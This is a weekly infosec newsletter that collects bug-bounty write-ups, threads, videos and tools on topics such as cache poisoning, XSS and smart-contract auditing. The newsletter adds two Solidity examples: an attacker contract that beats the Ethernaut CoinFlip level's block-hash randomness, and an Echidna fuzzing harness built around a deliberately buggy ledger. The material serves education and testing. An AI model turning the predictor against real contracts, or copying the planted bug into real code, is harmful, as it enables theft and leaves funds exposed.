👩‍💻IW Weekly #38: Cache Poisoning, XSS Payloads, Akamai and Amazon S3 buckets, Hybrid Fuzzing in Smart Contracts, SSO, Blockchain Security Audit, and much more…

Learn how to use XSS payloads that result in bounties up to $44,625.

Welcome to the #IWWeekly38 - the Monday newsletter that brings the best in Infosec straight to your inbox.

IWCON2022 finally came to a glorious end last night ❤️ Thank you for joining us. I hope you had a lot of fun and learned something new 😊 Please share your feedback here to help us make the next edition better for you :)

Coming back to today's newsletter, here are our top picks for this week: 7 articles, 6 threads, 5 videos, 2 GitHub repos and tools, and 1 job alert to help you get the most out of this newsletter and take a massive jump ahead in your career.

Excited? Let’s jump in 👇

📝 7 Infosec Articles (5 + 2 beginner-friendly)

#1 @TarunkantG has shared a unique case of cache poisoning that occurs between the Akamai CDN and Amazon S3 bucket origins.

#2 @pmnh_ and @UsmanMansha used Spring Expression Language (SpEL) injection in a Spring Boot application to bypass the Akamai WAF and achieve remote code execution (P1). Read on to learn how they achieved it.

#3 Read how @jzeerx found a server-side template injection (SSTI) that led to arbitrary file read on one of Asia's leading payment systems.

#4 Gafnit Amiga uncovered a major security flaw in AWS ECR Public that allowed external actors to delete, update, and create images, layers, and tags.

#5 Read Omar Hashem's in-depth article on CVE-2022-42710 in the Linear eMerge E3 series, which traces the path from XXE to stored XSS.



Beginner-friendly -

#1 Pratik Gaikwad discovered a privilege escalation vulnerability that allowed deleting accounts and workspaces belonging to other people and organizations.

#2 Abdelrhman Allam created a comprehensive blog post on single sign-on (SSO).


🧵 6 Insightful Threads (4 + 2 beginner-friendly)

#1 Do you want to learn hybrid fuzzing in smart contracts? Read this amazing thread by Patrick Collins.

#2 Want to improve your smart contract auditing? Read Pashov's thread on his plan for becoming an advanced smart contract auditor.

#3 Csanuragjain curated a list of notable blockchain security audit organisations along with the published audits.

#4 MixBytes shared their techniques for analyzing a smart contract audit report.

Beginner-friendly -

#1 Het Mehta provided a list of free security operations center (SOC) certifications.

#2 Abishek Meena shared his techniques for dealing with WAFs.


📽️ 5 Insightful Videos (3 + 2 beginner-friendly)

#1 @ProgrammerSmart walks you through Ethernaut level 03 - Coin Flip, a challenge where you beat the contract's "randomness" (derived from the previous block's hash, which is public on-chain) to guess the flip correctly ten times in a row.
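As an added illustration (not code from the video or from the Ethernaut project), here is the shape of a predictor contract for that level. It assumes the target exposes flip(bool) and computes its coin as blockhash(block.number - 1) divided by 2**255, which is what the published CoinFlip level does; the interface and contract names below are this example's own.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Assumed target interface (matches the Ethernaut CoinFlip level's public
// functions): flip(bool) compares our guess against the "coin" the level
// derives from the previous block's hash.
interface ICoinFlip {
    function flip(bool _guess) external returns (bool);
    function consecutiveWins() external view returns (uint256);
}

// Hypothetical attacker contract: it recomputes the level's coin in the same
// block and submits the matching guess, so every flip is a win.
contract CoinFlipPredictor {
    // Same constant the level uses: 2**255, so blockValue / FACTOR is 0 or 1.
    uint256 private constant FACTOR =
        57896044618658097711785492504343953926634992332820282019728792003956564819968;

    ICoinFlip public immutable target;

    constructor(address _target) {
        target = ICoinFlip(_target);
    }

    // Pure prediction logic, kept separate so it can be unit tested off-chain.
    function predict(uint256 blockValue) public pure returns (bool) {
        return blockValue / FACTOR == 1;
    }

    // Call this once per block: the level reverts if the same block hash is
    // used twice, so ten calls in ten distinct blocks give ten consecutive wins.
    function attack() external {
        uint256 blockValue = uint256(blockhash(block.number - 1));
        bool guess = predict(blockValue);
        require(target.flip(guess), "prediction failed");
    }
}
```

The lesson the level teaches is the one this code exploits: anything computed from block data (blockhash, timestamp, number) is readable by a contract executing in the same block, so it cannot serve as a secret random source.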

#2 Watch @fransrosen's story of achieving RCE on Apple through hot JAR swapping.

#3 Learn how to fuzz Ethereum smart contracts using Echidna, by @trailofbits.
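As an added example (not code from the Trail of Bits video or from the Echidna repository), the following shows the minimal shape of an Echidna property test: a deliberately buggy ledger plus a harness contract whose echidna_-prefixed view functions return false when an invariant is broken. The contract names, the TOTAL constant and the bug are constructed for this example; the three funded addresses are Echidna's default transaction senders.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed bug: transferring to yourself reads the recipient balance
// before the sender balance is debited, so the credit overwrites the debit
// and the caller ends up with more tokens than it started with.
contract Ledger {
    mapping(address => uint256) public balances;

    function transfer(address to, uint256 amount) public {
        uint256 fromBal = balances[msg.sender];
        uint256 toBal = balances[to];          // stale when to == msg.sender
        require(fromBal >= amount, "insufficient");
        balances[msg.sender] = fromBal - amount;
        balances[to] = toBal + amount;         // clobbers the debit above
    }
}

// Echidna harness. Public view functions prefixed echidna_ that return bool
// are the properties the fuzzer tries to falsify with random call sequences.
contract LedgerTest is Ledger {
    uint256 private constant TOTAL = 3000;

    // Echidna's default senders; funding them gives the fuzzer value to move.
    address private constant A = address(0x10000);
    address private constant B = address(0x20000);
    address private constant C = address(0x30000);

    constructor() {
        balances[A] = 1000;
        balances[B] = 1000;
        balances[C] = 1000;
    }

    // Honest transfers can only move value out of {A, B, C}, so their combined
    // balance must never exceed the initial supply. A self-transfer breaks
    // this, and Echidna prints the call sequence that does it.
    function echidna_no_inflation() public view returns (bool) {
        return balances[A] + balances[B] + balances[C] <= TOTAL;
    }
}
```

Run it with `echidna Ledger.sol --contract LedgerTest`; the fuzzer should report echidna_no_inflation as failed along with a transfer call where the recipient equals the sender. The property is written as a bound rather than an exact sum so that transfers to addresses outside the funded set do not produce false alarms.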

Beginner-friendly -

#1 Wondering which XSS payloads most often earn hackers bounties? Check out this video by @gregxsunday, where he discusses why, how and where XSS payloads get used, with examples that resulted in bounties of up to $44,625.

#2 Watch this talk on command-line data wrangling by @TomNomNom at NahamCon2022EU.


⚒️ 2 GitHub repositories & Tools

#1 Coinspect Security has created a collection of Foundry tests that includes attacks, bug bounty claims, and potential vulnerabilities on EVM chains.

#2 Immunefi's collaborative repository aims to provide all of the material you need to begin or expand your understanding of online security.


💰1 Job Alert

#1 PhonePe is looking for a Security Engineer. Check out the details here.

💸Advertise with us💸

We are looking to partner with amazing infosec, pen testing, and ethical hacking teams, brands, and companies from all over the world.

If you'd like to advertise to our 27k+ community of cybersecurity enthusiasts, click here to partner with us.

----------------------------------------------------------------------------------


That’s all for this week. Hope you enjoyed these incredible finds and learned something new from today’s newsletter.

Before we say bye…

If you found this newsletter interesting and know other people who would too, we'd really appreciate it if you could forward it to them 📨

If you have questions, comments, or feedback, just reply to this email or let us know on Twitter @InfoSecComm.

See you again next week.

Lots of love
Editorial team,
Infosec Writeups

This newsletter has been created in collaboration with our amazing ambassadors.

Resource contribution by: Nikhil A Memane, Bhavesh Harmalkar, Mohit Khemchandani, Vinay Kumar, Manikesh Singh, and Tuhin Bose.

Newsletter formatting by: Hardik Singh, Vinay Kumar, Siddharth and Ayush Singh.